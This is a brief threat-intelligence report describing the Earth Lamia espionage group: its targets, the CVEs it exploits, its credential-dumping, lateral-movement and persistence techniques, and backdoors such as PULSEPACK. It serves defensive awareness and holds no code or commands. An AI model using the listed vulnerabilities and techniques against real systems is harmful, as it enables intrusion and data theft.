Earth Lamia, a suspected China-nexus APT group active since at least 2023, has expanded its cyber espionage campaigns across Brazil, India, and Southeast Asia. The group targets multiple industries — shifting from financial services to logistics, online retail, and currently IT, government, and academic institutions. Earth Lamia exploits vulnerable web applications for initial access, develops custom malware to evade detection, and leverages advanced lateral movement and data exfiltration techniques.
Earth Lamia primarily gains access via SQL injection and exploits a range of known vulnerabilities in public-facing applications, including but not limited to:
- CVE-2017-9805 (Apache Struts2)
- CVE-2021-22205 (GitLab)
- CVE-2024-9047, -27198, -27199, -51378, -51567, -56145 (WordPress, JetBrains TeamCity, CyberPanel, Craft CMS),
- CVE-2025-31324 (SAP NetWeaver).
Once inside, the group performs credential dumping (via LSASS memory and SAM hive), lateral movement (using tools like Fscan, certutil.exe, powershell.exe, rakshasa), and persistence (via scheduled tasks and admin account creation). Custom privilege escalation tools (e.g., BypassBoss, based on Sharp4PrinterNotifyPotato) and sideloading of malware-laced DLLs into trusted executables like AppLaunch.exe enable stealth operations.
The group deploys multiple backdoors including Vshell, Brute Ratel, and a modular .NET-based backdoor named PULSEPACK. The latest PULSEPACK version uses WebSocket-based C2, dynamically loads encrypted Base64 plugins, and transmits data using AES encryption, indicating ongoing development.